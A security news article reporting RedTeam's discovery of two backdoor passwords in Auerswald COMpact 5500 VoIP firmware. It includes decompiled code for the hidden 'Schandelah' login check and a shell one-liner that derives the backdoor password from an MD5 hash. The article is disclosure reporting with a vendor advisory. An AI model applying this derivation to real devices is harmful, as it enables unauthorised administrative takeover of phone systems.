One of Auerwalds widely used products exposes two backdoor passwords that will allow threat actors to escalate privileges
Auerswald, the German telecommunications hardware manufacturer for voice over Internet Protocol (VoIP), was detected with multiple backdoors. A penetration testing routine carried out by RedTeam revealed two backdoor passwords that allowed attackers with access to the management application to take complete administrative control over the device.
The process begins with downloading the firmware image for COMpact 5500, version 7.8A, from Auerswald's support website. The reverse engineering tool Ghidra is used for decompilation; the analysis revealed a "sub-admin" default user.
A certain username was compared to the string "Schandelah." Researchers found this suspicious given that Schandelah is the name of a small village in Northern Germany where Auerswald produces their products.
iVar5 = strcmp((char *)username,"Schandelah");
if (iVar5 == 0) {
FUN_00287a84(0,&local_94);
if (local_600 == (undefined4 *)0x0) {
[...]
}
else {
iVar5 = strcmp((char *)local_600,(char *)&local_94);
if (iVar5 == 0) {
[...]
goto LAB_00015954;
}
}
}
For the username Schandelah, a wrapper function FUN_00287a84
references the variable local_94
. While examing other parameters where local_600
is used as a password, local_94
was the password for Schandelah. The password was constructed using the following algorithm
The backdoor password was seven characters of MD5 hash; after calculating the password, researchers could log in successfully.
$ echo -n 1234123412r2d230.08.2021 | md5sum | egrep -o '^.{7}'
1432d89
"Equipped with this password, we then could authenticate successfully. After logging in, the web interface showed a special service page, which allowed, among other functions, to reset the administrator password."
While analyzing CVE-2021-40856, researchers came across CVE-2021-40857 that enables users with limited access to escalate privileges to sub-admin, an attacker can configure the PBX at this level.
Due to severe complications upon exploitation, backdoor passwords are rated as high. Auerswald immediately responded to the report given by RedTeam and published an Advisory in December. The only workaround available is to disable or restrict access to the web-based management interface completely; hence users are advised to upgrade to the newest version as soon as possible.